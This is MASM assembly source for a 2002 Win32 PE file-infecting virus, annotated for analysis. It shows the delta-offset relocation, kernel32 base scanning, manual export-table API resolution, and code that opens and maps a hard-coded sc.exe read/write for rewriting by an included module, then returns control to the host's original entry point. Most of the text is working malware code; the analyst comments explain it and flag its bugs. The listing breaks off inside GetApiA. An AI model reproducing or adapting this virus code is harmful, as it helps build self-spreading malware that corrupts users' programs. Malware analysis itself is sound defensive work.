; ---------------------------------------------------------------------
; virus.asm -- main body of a Win32 PE file infector ("By Hume", 2002).
; MASM, Intel syntax, .586, flat model, stdcall, case-sensitive symbols.
; Kept for analysis; notes below are written for the analyst, not the author.
;  * Everything between vBegin and vEnd (code AND data, all inside .CODE)
;    is the blob appended to a host PE; VirusLen is its byte size and
;    __Start is the entry the host is redirected to.
;  * hd.h, mac.h, s_api.asm, dislen.asm and modipe.asm are pulled in by
;    include and are not part of this listing. Names used below but not
;    defined here (appBase, k32Base, lpApiAddrs, aGetModuleHandle,
;    aCreateFile, aGetFileSize, aCreateFileMapping, aMapViewOfFile,
;    aUnmapViewOfFile, aCloseHandle, aExitProcess) come from those files.
;  * All data is reached as [ebp+label]; ebp holds the delta between the
;    assembled and the runtime address (computed at __Start).
; ---------------------------------------------------------------------
.586
.model flat, stdcall
option casemap :none ; case sensitive
include c:\hd\hd.h
include c:\hd\mac.h
;;--------------
GetApiA proto :DWORD,:DWORD ; GetApiA(Base, sApi): resolve one export by name; body is in s_api.asm (partly listed below)
;;--------------
.CODE
VirusLen = vEnd-vBegin ; size of the injectable blob (code + data); the file-mapping code below assumes it fits in 1000h bytes
vBegin: ; start of the blob copied into hosts (VirusLen = vEnd - vBegin)
;-----------------------------------------
include s_api.asm ; export-table walker used to resolve kernel32 APIs by name (K32_api_retrieve / GetApiA, listed further down)
;-----------------------------------------
; --- infection target and file-mapping state (always accessed as [ebp+...]) ---
desfile db "sc.exe",0 ; hard-coded target; opened by relative path, i.e. whatever sc.exe is in the current directory
fsize dd ? ; size of the target file, from GetFileSize
hfile dd ? ; CreateFile handle to the target
hMap dd ? ; CreateFileMapping handle (mapping is fsize + 1000h)
pMem dd ? ; MapViewOfFile base of the writable view
;-----------------------------------------
; --- PE-rewriting scratch; presumably filled and used by modipe.asm, which is not in this listing -- confirm there ---
pe_Header dd ? ; offset/VA of the target's IMAGE_NT_HEADERS (inferred from the name)
sec_align dd ? ; target SectionAlignment (inferred from the name)
file_align dd ? ; target FileAlignment (inferred from the name)
newEip dd ? ; entry point written into the target
oldEip dd ? ; original entry point RVA; __where does jmp base+oldEip when running inside a host
inc_size dd ? ; bytes added to the image (inferred from the name)
oldEnd dd ? ; original end of the last section / file (inferred from the name)
;-----------------------------------------
sMessageBoxA db "MessageBoxA",0 ; API name string
aMessageBoxA dd 0 ; slot for its address; nothing in this listing fills it (the resolver loop only walks lpApiAddrs)
;; temporaries / payload strings (none of these are referenced by the code visible in this listing)
sztit db "By Hume,2002",0
szMsg0 db "Hey,Hope U enjoy it!",0
CopyRight db "The SoftWare WAS OFFERRED by Hume[AfO]",0dh,0ah
db " Thx for using it!",0dh,0ah
db "Contact: Humewen@21cn.com",0dh,0ah
db " humeasm.yeah.net",0dh,0ah
db "The add Code SiZe:(heX)" ; NOT NUL-terminated: the text runs straight into val
val dd 0,0,0,0 ; 16 zero bytes directly after the text above -- presumably where hex digits + terminator get written (dislen.asm?); verify
;;-----------------------------------------
__Start: ; blob entry point (the host's entry point is redirected here)
; Delta-offset trick: the blob runs wherever the infector placed it, so every
; [ebp+label] below is relocated by ebp = (runtime _gd) - (assembled _gd).
call _gd
_gd:
pop ebp ; ebp = runtime address of _gd
sub ebp,offset _gd ; ebp = runtime minus assembled address (the relocation delta)
; needed because inside another program the load address is not the one this was assembled for
mov dword ptr [ebp+appBase],ebp ; stash the delta for the include files (appBase is declared in an include)
; Locate kernel32 by scanning downwards from the return address on the stack.
; Assumes (a) the process entry point was CALLed from inside kernel32, so
; [esp] points into it, and (b) kernel32 sits at its preferred ImageBase.
; Neither holds on modern Windows (ASLR, entry reached via ntdll), where the
; scan mis-detects or faults: there is no SEH and no lower bound on eax.
mov eax,[esp] ; return address left by the loader's call to the entry point
xor edx,edx
getK32Base:
dec eax ; scan backwards one byte at a time
mov dx,word ptr [eax+IMAGE_DOS_HEADER.e_lfanew] ; candidate e_lfanew, low 16 bits only (i.e. [eax+3ch])
test dx,0f000h ; DOS header + stub assumed smaller than 4096 bytes; larger values are rejected cheaply
jnz getK32Base
cmp eax,dword ptr [eax+edx+IMAGE_NT_HEADERS.OptionalHeader.ImageBase]
jnz getK32Base ; match only if the candidate's ImageBase equals eax (so a relocated/ASLR'd module never matches)
mov [ebp+k32Base],eax ; accepted as kernel32's base; no MZ/PE signature check is performed
; Resolve the API table: lpApiAddrs is a 0-terminated list of (assembled)
; name-string addresses; results are stored in order starting at aGetModuleHandle.
lea edi,[ebp+aGetModuleHandle] ; edi -> first address slot
lea esi,[ebp+lpApiAddrs] ; esi -> list of name-string addresses
lop_get:
lodsd
cmp eax,0
jz End_Get ; 0 terminates the list
add eax,ebp ; relocate the name-string address
push eax
push dword ptr [ebp+k32Base]
call GetApiA ; GetApiA(k32Base, name); see s_api.asm below -- presumably eax = export VA, 0 when not found
stosd ; stored unchecked; a 0 result would be stored as-is and the later call [ebp+aXxx] would fault
jmp lop_get
End_Get:
call my_infect ; try to infect sc.exe; returns on every path (success or failure)
include dislen.asm ; not in this listing; presumably the "add Code SiZe" message (see CopyRight/val) -- confirm
;-----------------------------------------
CouldNotInfect:
__where:
; Parasite or dropper? The infection marker 'dark' is looked for in the
; running image's IMAGE_FILE_HEADER.TimeDateStamp (offset 8 of IMAGE_NT_HEADERS);
; presumably modipe.asm writes it into hosts -- confirm there.
xor eax,eax
push eax
call [ebp+aGetModuleHandle] ; GetModuleHandle(NULL) -> base of the running image
mov esi,eax
add esi,[esi+3ch] ; esi -> the running image's IMAGE_NT_HEADERS
cmp dword ptr [esi+8],'dark' ; TimeDateStamp holds the marker?
je jmp_oep
jmp __xit ; no marker: this is the stand-alone dropper, just exit
jmp_oep:
add eax,[ebp+oldEip] ; eax = image base + original entry RVA (oldEip was stored by the infector that patched this host)
jmp eax ; hand control to the host's real entry point
my_infect: ; infect the file named by desfile; the PE rewrite itself is modipe.asm (not listed)
; Opens sc.exe read/write, maps it with 1000h extra bytes, lets modipe.asm
; patch the view, then unmaps/closes. Returns via ret on every path.
; Reviewer notes:
;  * The mapping is a fixed 1000h larger than the file, not VirusLen; the
;    blob must fit in 4096 bytes for this to be sufficient.
;  * A file mapping larger than the file extends the file to the mapping
;    size, so the target grows by 1000h as soon as CreateFileMapping
;    succeeds, even if the later steps fail.
;  * Error-path stack bug: the handle pushed right after mov [ebp+hfile],eax
;    is only popped after GetFileSize succeeds. On the GetFileSize failure
;    branch (je __sclosefile) it is still on the stack when ret executes,
;    so ret pops the handle value as its return address.
xor eax,eax
push eax ; hTemplateFile = NULL
push eax ; dwFlagsAndAttributes = 0
push OPEN_EXISTING ; dwCreationDisposition
push eax ; lpSecurityAttributes = NULL
push eax ; dwShareMode = 0 (exclusive)
push GENERIC_READ+GENERIC_WRITE ; dwDesiredAccess
lea eax,[ebp+desfile]
push eax ; lpFileName = "sc.exe"
call [ebp+aCreateFile] ; open the target
inc eax ; INVALID_HANDLE_VALUE (-1) becomes 0
je __Err
dec eax
mov [ebp+hfile],eax
push eax ; keep the handle on the stack for CreateFileMapping (popped by "pop eax" below -- but not on the failure branch)
sub ebx,ebx
push ebx ; lpFileSizeHigh = NULL
push eax ; hFile
call [ebp+aGetFileSize]
inc eax ; INVALID_FILE_SIZE (-1) becomes 0
je __sclosefile ; NOTE: jumps out with the pushed handle still on the stack (see header note)
dec eax
mov [ebp+fsize],eax
xchg eax,ecx
add ecx,1000h ; mapping size = file size + 4096 (fixed; not tied to VirusLen)
pop eax ; eax = hfile again
xor ebx,ebx
push ebx ; lpName = NULL
push ecx ; dwMaximumSizeLow = fsize + 1000h
push ebx ; dwMaximumSizeHigh = 0
push PAGE_READWRITE
push ebx ; lpAttributes = NULL
push eax ; hFile
call [ebp+aCreateFileMapping]
test eax,eax
je __sclosefile
mov [ebp+hMap],eax ; mapping created
xor ebx,ebx
push ebx ; dwNumberOfBytesToMap = 0 (whole mapping)
push ebx ; dwFileOffsetLow = 0
push ebx ; dwFileOffsetHigh = 0
push FILE_MAP_WRITE
push eax ; hMap
call [ebp+aMapViewOfFile]
test eax,eax
je __sclosemap
mov [ebp+pMem],eax ; writable view of the whole (extended) file
;--------------------------------------------
; the following is modifying part,add new section
;--------------------------------------------
include modipe.asm ; rewrites the mapped PE in place -- presumably adds the section, patches the entry point and sets the 'dark' marker; not in this listing
__sunview:
push [ebp+pMem]
call [ebp+aUnmapViewOfFile]
__sclosemap:
push [ebp+hMap]
call [ebp+aCloseHandle]
__sclosefile:
push [ebp+hfile]
call [ebp+aCloseHandle]
__Err::
ret
;-----------------------------------------
__xit: ; terminate the process; reached from __where when the running image carries no 'dark' marker
push 0
call [ebp+aExitProcess] ; ExitProcess(0) -- does not return
vEnd: ; end of the blob; VirusLen = vEnd - vBegin
;-----------------------------------------
END __Start
;;==============================================
;;s_api.asm
;; manual export-table lookup (no GetProcAddress)
; K32_api_retrieve(Base, sApi) -> eax = index into AddressOfNameOrdinals of
; the first export whose name starts with sApi, or 0 when nothing matched.
; Besides its two stack arguments it relies on registers set by the caller
; (GetApiA, which does pushad first):
;   edi = VA of AddressOfNames          (array of name RVAs)
;   ecx = loop count, presumably NumberOfNames (a 0 here wraps around)
;   edx = VA of AddressOfNameOrdinals   (saved on entry, used at foundit)
;   Base = module base, added to each name RVA
; Clobbers ebx and esi -- acceptable only because the caller saved them.
; Reviewer notes:
;  * Prefix match, not exact: the loop stops when sApi reaches its NUL
;    without checking that the export name ends there, so the first export
;    in name-table order (normally alphabetical) starting with sApi wins.
;  * A return of 0 is ambiguous: it is also the index of the first entry.
K32_api_retrieve proc Base:DWORD ,sApi:DWORD
push edx ; save AddressOfNameOrdinals for foundit
xor eax,eax ; eax = current name index
Next_Api:
mov esi,sApi ; restart the wanted name from its first character
xor edx,edx
dec edx ; edx = -1; pre-incremented to the character position below
Match_Api_name:
movzx ebx,byte ptr [esi]
inc esi
cmp ebx,0
je foundit ; end of sApi: all characters matched so far (export name not required to end here)
inc edx
push eax
mov eax,[edi+eax*4] ; RVA of the eax-th export name
add eax,Base ; RVA -> VA
cmp bl,byte ptr [eax+edx] ; compare one character
pop eax
je Match_Api_name ; still matching: next character
inc eax ; mismatch: next export name
loop Next_Api ; until the caller's count is exhausted
no_exist:
pop edx ; restore edx
xor eax,eax ; not found -> 0 (indistinguishable from ordinal index 0)
ret
foundit:
pop edx ; edx = AddressOfNameOrdinals
movzx eax,word ptr [edx+eax*2] ; eax = ordinal index of the matching name (word array); caller uses it to index AddressOfFunctions
ret
K32_api_retrieve endp
;-----------------------------------------
GetApiA proc Base:DWORD,sApi:DWORD
local ADDRofFun:DWORD
pushad
mov esi,Base
mov eax,esi
mov ebx,eax
mov ecx,eax
mov edx,eax
mov edi,eax ;all is Base!
add ecx,[ecx+3ch] ;現在esi=off PE_HEADER